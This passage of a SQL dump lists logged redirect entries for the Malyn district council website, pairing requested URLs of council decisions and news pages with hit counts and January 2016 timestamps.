00:00:00',301),(24514,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo?page=1','','','',17,0,'2016-01-08 22:21:13','0000-00-00 00:00:00',301),(24515,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?page=1','','','',9,0,'2016-01-08 22:22:13','0000-00-00 00:00:00',301),(24516,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39&layout=blog&Itemid=76&lang=uk&limitstart=15','','','',1,0,'2016-01-09 00:26:18','0000-00-00 00:00:00',301),(24517,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-5-5','','','',1,0,'2016-01-09 01:44:07','0000-00-00 00:00:00',301),(24518,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-1-1','','','',1,0,'2016-01-09 02:01:52','0000-00-00 00:00:00',301),(24519,'http://www.malyn-rayrada.org.ua/index.php?Itemid=13&catid=8:2010-06-05-12-54-02&id=10:2010-06-05-15-11-20&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-09 02:17:38','0000-00-00 00:00:00',301),(24520,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38&Itemid=73&lang=ru','','','',2,0,'2016-01-09 02:25:41','0000-00-00 00:00:00',301),(24521,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-6-6','','','',1,0,'2016-01-09 05:15:39','0000-00-00 00:00:00',301),(24522,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/908-pro-prisvoennya-chergovogo-rangu-posadovoji-osobi-mistsevogo-samovryaduvannya-golovi-rajonnoji-radi','','','',3,0,'2016-01-09 05:58:08','0000-00-00 00:00:00',301),(24523,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/910-pro-pereukladennya-kontraktiv-z-kerivnikami-pidpriemstv-ustanov-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',3,0,'2016-01-09 05:58:12','0000-00-00 00:00:00',301),(24524,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/911-pro-zatverdzhennya-novogo-skladu-komisiji-rajonnoji-radi-z-pitan-ponovlennya-prav-reabilitovanikh','','','',3,0,'2016-01-09 05:58:13','0000-00-00 00:00:00',301),(24525,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/912-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',3,0,'2016-01-09 05:58:15','0000-00-00 00:00:00',301),(24526,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/912-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 05:58:17','0000-00-00 00:00:00',301),(24527,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/913-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',3,0,'2016-01-09 05:58:19','0000-00-00 00:00:00',301),(24528,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-3-3','','','',1,0,'2016-01-09 09:32:53','0000-00-00 00:00:00',301),(24529,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/fedorivka-136','','','',6,0,'2016-01-09 10:33:00','0000-00-00 00:00:00',301),(24530,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-77','','','',4,0,'2016-01-09 10:33:05','0000-00-00 00:00:00',301),(24531,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1111-22-114','','','',4,0,'2016-01-09 10:33:12','0000-00-00 00:00:00',301),(24532,'http://www.malyn-rayrada.org.ua/index.php/565-vikonannja-dohidnoi-chastini-miscevih-bjudzhetiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-09 10:33:16','0000-00-00 00:00:00',301),(24533,'http://www.malyn-rayrada.org.ua/index.php/566-pro-sklikannja-27-sesii-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-09 10:33:18','0000-00-00 00:00:00',301),(24534,'http://www.malyn-rayrada.org.ua/index.php/592-vitaemo-iz-svjatom-pershogo-dzvonika_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-09 10:33:19','0000-00-00 00:00:00',301),(24535,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/266-pro-vnesennja-zmin-do-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-09 10:34:37','0000-00-00 00:00:00',301),(24536,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=1','','','',7,0,'2016-01-09 11:28:03','0000-00-00 00:00:00',301),(24537,'http://malyn-rayrada.org.ua/index.php/264-6-ljutogo-2012-roku-vipadkove-foto','','','',9,0,'2016-01-09 11:29:28','0000-00-00 00:00:00',301),(24538,'http://malyn-rayrada.org.ua/index.php/265-nadhodzhennja-dohodiv-do-bjudzhetu-zhitomirskoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-09 11:29:34','0000-00-00 00:00:00',301),(24539,'http://malyn-rayrada.org.ua/index.php/407-vorsivska-silska-gromada-znovu-na-zv-jazku','','','',2,0,'2016-01-09 11:29:37','0000-00-00 00:00:00',301),(24540,'http://malyn-rayrada.org.ua/index.php/517-vidbulas-20-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-09 11:29:43','0000-00-00 00:00:00',301),(24541,'http://malyn-rayrada.org.ua/index.php/565-vikonannja-dohidnoi-chastini-miscevih-bjudzhetiv?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-09 11:29:57','0000-00-00 00:00:00',301),(24542,'http://malyn-rayrada.org.ua/index.php/677-zaversheno-pidgotovku-do-provedennja-chergovoi_4','','','',2,0,'2016-01-09 11:30:06','0000-00-00 00:00:00',301),(24543,'http://malyn-rayrada.org.ua/index.php/711-vidbulosja-pidpisannja-ugodi-pro-vreguljuvannja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-09 11:53:23','0000-00-00 00:00:00',301),(24544,'http://malyn-rayrada.org.ua/index.php/973-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-antiteroristichnoji-operatsiji?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-09 11:54:27','0000-00-00 00:00:00',301),(24545,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/506-pro-hid-vikonannja-rajonnoi-programi-prizovna_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-09 11:55:07','0000-00-00 00:00:00',301),(24546,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/144-pro-hid-vikonannja-rajonnoi-cilovoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:56:13','0000-00-00 00:00:00',301),(24547,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/146-pro-peredachu-kotelni','','','',3,0,'2016-01-09 11:56:15','0000-00-00 00:00:00',301),(24548,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/205-pro-programu-zabezpechennja-deputatskoi-dijalnosti?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:56:20','0000-00-00 00:00:00',301),(24549,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/207-pro-zvit-golovi-postijnoi-komisii-rajonnoi-radi-z?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:56:26','0000-00-00 00:00:00',301),(24550,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/215-pro-efektivnist-finansovoi-pidtrimki-nadanoi-z?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:56:28','0000-00-00 00:00:00',301),(24551,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/219-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_2','','','',3,0,'2016-01-09 11:56:32','0000-00-00 00:00:00',301),(24552,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/229-pro-vnesennja-i-zatverdzhennja-zmin-do-statutu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:56:36','0000-00-00 00:00:00',301),(24553,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/232-pro-formuvannja-statutnih-fondiv-pidpriemstv-shho?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:56:39','0000-00-00 00:00:00',301),(24554,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/92-pro-hid-vikonannja-cilovoi-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:56:51','0000-00-00 00:00:00',301),(24555,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/659-pro-pochatok-navchalnogo-procesu-u?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-09 11:58:10','0000-00-00 00:00:00',301),(24556,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/783-pro-programu-socialno-ekonomichnogo-rozvitku_4','','','',3,0,'2016-01-09 11:58:14','0000-00-00 00:00:00',301),(24557,'http://malyn-rayrada.org.ua/index.php/1152-na-poryadku-dennomu-virishennya-problem-silskikh-gromad?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-01-09 12:20:43','0000-00-00 00:00:00',301),(24558,'http://malyn-rayrada.org.ua/index.php/1156-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-pershe-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-01-09 12:20:45','0000-00-00 00:00:00',301),(24559,'http://malyn-rayrada.org.ua/index.php/1159-pro-sklikannya-41sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-01-09 12:20:47','0000-00-00 00:00:00',301),(24560,'http://malyn-rayrada.org.ua/index.php/68-pro-provedennja-rajonnogo-konkursu-sered-silskih-i?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-09 12:20:53','0000-00-00 00:00:00',301),(24561,'http://malyn-rayrada.org.ua/administrator/components/com_simplephotogallery/lib/uploadFile.php','','','',2,0,'2016-01-09 13:21:54','0000-00-00 00:00:00',301),(24562,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=969:-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-09 13:33:04','0000-00-00 00:00:00',301),(24563,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=616:----l-r&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-09 13:33:05','0000-00-00 00:00:00',301),(24564,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=679:2012-05-17-10-00-53&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2016-01-09 15:07:43','0000-00-00 00:00:00',301),(24565,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0821-3-96','','','',10,0,'2016-01-09 19:35:57','0000-00-00 00:00:00',301),(24566,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56&layout=blog&Itemid=97&lang=uk','','','',1,0,'2016-01-09 20:44:56','0000-00-00 00:00:00',301),(24567,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1266:2014-04-03-05-25-14&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-09 21:36:56','0000-00-00 00:00:00',301),(24568,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1274:-l-r&Itemid=98&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-09 21:44:50','0000-00-00 00:00:00',301),(24569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:---------6---16112010-5----------------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2016-01-09 23:37:47','0000-00-00 00:00:00',301),(24570,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1287:2014-04-23-06-49-34&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2016-01-10 00:13:47','0000-00-00 00:00:00',301),(24571,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1287:2014-04-23-06-49-34&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-10 01:25:40','0000-00-00 00:00:00',301),(24572,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1266:2014-04-03-05-25-14&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-10 01:26:59','0000-00-00 00:00:00',301),(24573,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1267:2014-04-03-21-52-50&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2016-01-10 01:30:27','0000-00-00 00:00:00',301),(24574,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1279:2014-04-13-11-36-46&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-10 02:14:40','0000-00-00 00:00:00',301),(24575,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-2-12','','','',1,0,'2016-01-10 03:54:26','0000-00-00 00:00:00',301),(24576,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33&Itemid=66&lang=uk','','','',1,0,'2016-01-10 04:01:58','0000-00-00 00:00:00',301),(24577,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1279:2014-04-13-11-36-46&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-10 09:08:10','0000-00-00 00:00:00',301),(24578,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1268:-l-r&Itemid=98&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-10 09:28:54','0000-00-00 00:00:00',301),(24579,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1268:-l-r&Itemid=98&lang=en&option=com_content&view=article','','','',1,0,'2016-01-10 10:13:53','0000-00-00 00:00:00',301),(24580,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1282:-30-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-10 11:14:10','0000-00-00 00:00:00',301),(24581,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1292:-i-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-10 11:14:39','0000-00-00 00:00:00',301),(24582,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1267:2014-04-03-21-52-50&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-10 11:18:08','0000-00-00 00:00:00',301),(24583,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&Itemid=14&lang=ru','','','',1,0,'2016-01-10 12:19:56','0000-00-00 00:00:00',301),(24584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en&limitstart=15','','','',1,0,'2016-01-10 13:23:27','0000-00-00 00:00:00',301),(24585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en&limitstart=30','','','',1,0,'2016-01-10 13:23:35','0000-00-00 00:00:00',301),(24586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=en&limitstart=5','','','',1,0,'2016-01-10 13:34:23','0000-00-00 00:00:00',301),(24587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=ru&limitstart=10','','','',1,0,'2016-01-10 13:34:35','0000-00-00 00:00:00',301),(24588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=en&limitstart=20','','','',1,0,'2016-01-10 13:34:36','0000-00-00 00:00:00',301),(24589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=uk&limitstart=10','','','',1,0,'2016-01-10 13:34:40','0000-00-00 00:00:00',301),(24590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=ru&limitstart=5','','','',1,0,'2016-01-10 13:35:08','0000-00-00 00:00:00',301),(24591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=210:-2010-&Itemid=60&lang=en','','','',1,0,'2016-01-10 13:35:08','0000-00-00 00:00:00',301),(24592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=274:2011-03-28-08-22-32&Itemid=62&lang=ru','','','',1,0,'2016-01-10 13:35:08','0000-00-00 00:00:00',301),(24593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=274:2011-03-28-08-22-32&Itemid=62&lang=uk','','','',1,0,'2016-01-10 13:35:09','0000-00-00 00:00:00',301),(24594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=350:-----l---28r----&Itemid=68&lang=ru','','','',1,0,'2016-01-10 13:35:09','0000-00-00 00:00:00',301),(24595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&lang=en','','','',1,0,'2016-01-10 13:35:10','0000-00-00 00:00:00',301),(24596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&catid=37:--21102011-&Itemid=72&lang=uk','','','',1,0,'2016-01-10 13:35:10','0000-00-00 00:00:00',301),(24597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=550:2012-01-26-12-39-51&Itemid=76&lang=ru','','','',1,0,'2016-01-10 13:35:13','0000-00-00 00:00:00',301),(24598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&lang=ru','','','',1,0,'2016-01-10 13:35:20','0000-00-00 00:00:00',301),(24599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&Itemid=77&lang=uk','','','',1,0,'2016-01-10 13:35:20','0000-00-00 00:00:00',301),(24600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=632:-2011-2015-&catid=42&Itemid=80&lang=ru','','','',5,0,'2016-01-10 13:35:21','0000-00-00 00:00:00',301),(24601,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&Itemid=80&lang=ru','','','',1,0,'2016-01-10 13:35:21','0000-00-00 00:00:00',301),(24602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=634:-2016-&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2016-01-10 13:35:22','0000-00-00 00:00:00',301),(24603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=636:-2011-2015-&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2016-01-10 13:35:22','0000-00-00 00:00:00',301),(24604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=642:2012-04-03-12-53-05&Itemid=64&lang=uk','','','',1,0,'2016-01-10 13:35:22','0000-00-00 00:00:00',301),(24605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=642:2012-04-03-12-53-05&Itemid=64&lang=ru','','','',1,0,'2016-01-10 13:35:22','0000-00-00 00:00:00',301),(24606,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&Itemid=70&lang=ru','','','',1,0,'2016-01-10 13:35:29','0000-00-00 00:00:00',301),(24607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&lang=uk','','','',1,0,'2016-01-10 13:35:29','0000-00-00 00:00:00',301),(24608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&Itemid=5&lang=ru','','','',1,0,'2016-01-10 13:35:29','0000-00-00 00:00:00',301),(24609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=703:---------2012-&Itemid=70&lang=en','','','',1,0,'2016-01-10 13:35:29','0000-00-00 00:00:00',301),(24610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&Itemid=86&lang=uk','','','',1,0,'2016-01-10 13:35:30','0000-00-00 00:00:00',301),(24611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=707:-231-280312-l-2012-r&Itemid=82&lang=en','','','',1,0,'2016-01-10 13:35:30','0000-00-00 00:00:00',301),(24612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=uk','','','',1,0,'2016-01-10 13:35:33','0000-00-00 00:00:00',301),(24613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&lang=ru','','','',1,0,'2016-01-10 13:35:34','0000-00-00 00:00:00',301),(24614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&catid=11&lang=uk','','','',1,0,'2016-01-10 13:35:34','0000-00-00 00:00:00',301),(24615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=795:--------20--2011--108-l---r----&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2016-01-10 13:35:34','0000-00-00 00:00:00',301),(24616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&Itemid=84&lang=uk','','','',1,0,'2016-01-10 13:35:34','0000-00-00 00:00:00',301),(24617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&lang=ru','','','',1,0,'2016-01-10 13:35:35','0000-00-00 00:00:00',301),(24618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=uk&limitstart=10','','','',1,0,'2016-01-10 13:36:01','0000-00-00 00:00:00',301),(24619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&lang=uk','','','',1,0,'2016-01-10 13:36:19','0000-00-00 00:00:00',301),(24620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=850:-2013-&Itemid=85&lang=uk','','','',1,0,'2016-01-10 13:36:31','0000-00-00 00:00:00',301),(24621,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&Itemid=14&lang=ru','','','',1,0,'2016-01-10 13:36:32','0000-00-00 00:00:00',301),(24622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&lang=uk','','','',1,0,'2016-01-10 13:36:34','0000-00-00 00:00:00',301),(24623,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-01-10 13:36:36','0000-00-00 00:00:00',301),(24624,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&lang=en','','','',1,0,'2016-01-10 13:36:36','0000-00-00 00:00:00',301),(24625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&lang=en','','','',1,0,'2016-01-10 13:36:38','0000-00-00 00:00:00',301),(24626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&Itemid=85&lang=uk','','','',1,0,'2016-01-10 13:36:38','0000-00-00 00:00:00',301),(24627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=en&limitstart=15','','','',1,0,'2016-01-10 13:36:49','0000-00-00 00:00:00',301),(24628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=uk&limitstart=5','','','',1,0,'2016-01-10 13:38:35','0000-00-00 00:00:00',301),(24629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33:-20052011&Itemid=66&lang=uk','','','',2,0,'2016-01-10 13:38:49','0000-00-00 00:00:00',301),(24630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&Itemid=42&lang=ru','','','',1,0,'2016-01-10 13:39:31','0000-00-00 00:00:00',301),(24631,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=196:---------------------2005-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2016-01-10 13:39:31','0000-00-00 00:00:00',301),(24632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=205:--------2011--&Itemid=60&lang=en','','','',1,0,'2016-01-10 13:39:32','0000-00-00 00:00:00',301),(24633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&Itemid=66&lang=uk','','','',1,0,'2016-01-10 13:39:34','0000-00-00 00:00:00',301),(24634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&Itemid=66&lang=uk','','','',1,0,'2016-01-10 13:39:35','0000-00-00 00:00:00',301),(24635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&Itemid=66&lang=uk','','','',1,0,'2016-01-10 13:39:35','0000-00-00 00:00:00',301),(24636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&Itemid=66&lang=ru','','','',1,0,'2016-01-10 13:39:35','0000-00-00 00:00:00',301),(24637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&Itemid=66&lang=en','','','',1,0,'2016-01-10 13:39:36','0000-00-00 00:00:00',301),(24638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&Itemid=8&lang=ru','','','',1,0,'2016-01-10 13:39:36','0000-00-00 00:00:00',301),(24639,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4:2010-06-05-12-51-18&Itemid=8&lang=ru','','','',2,0,'2016-01-10 13:39:37','0000-00-00 00:00:00',301),(24640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=416:2011-09-29-06-48-53&catid=37&Itemid=72&lang=uk','','','',1,0,'2016-01-10 13:39:37','0000-00-00 00:00:00',301),(24641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=418:2011-09-29-08-40-03&Itemid=72&lang=uk','','','',1,0,'2016-01-10 13:39:38','0000-00-00 00:00:00',301),(24642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&Itemid=72&lang=ru','','','',1,0,'2016-01-10 13:39:38','0000-00-00 00:00:00',301),(24643,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&Itemid=73&lang=uk','','','',1,0,'2016-01-10 13:39:38','0000-00-00 00:00:00',301),(24644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&Itemid=6&lang=uk','','','',1,0,'2016-01-10 13:40:08','0000-00-00 00:00:00',301),(24645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=525:2011-12-30-10-19-27&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2016-01-10 13:40:09','0000-00-00 00:00:00',301),(24646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&lang=uk','','','',4,0,'2016-01-10 13:40:09','0000-00-00 00:00:00',301),(24647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:---4050-vi-l--r----1--2013-&catid=11&Itemid=14&lang=ru','','','',1,0,'2016-01-10 13:40:09','0000-00-00 00:00:00',301),(24648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=544:2012-01-26-12-03-44&catid=39&Itemid=76&lang=ru','','','',1,0,'2016-01-10 13:40:10','0000-00-00 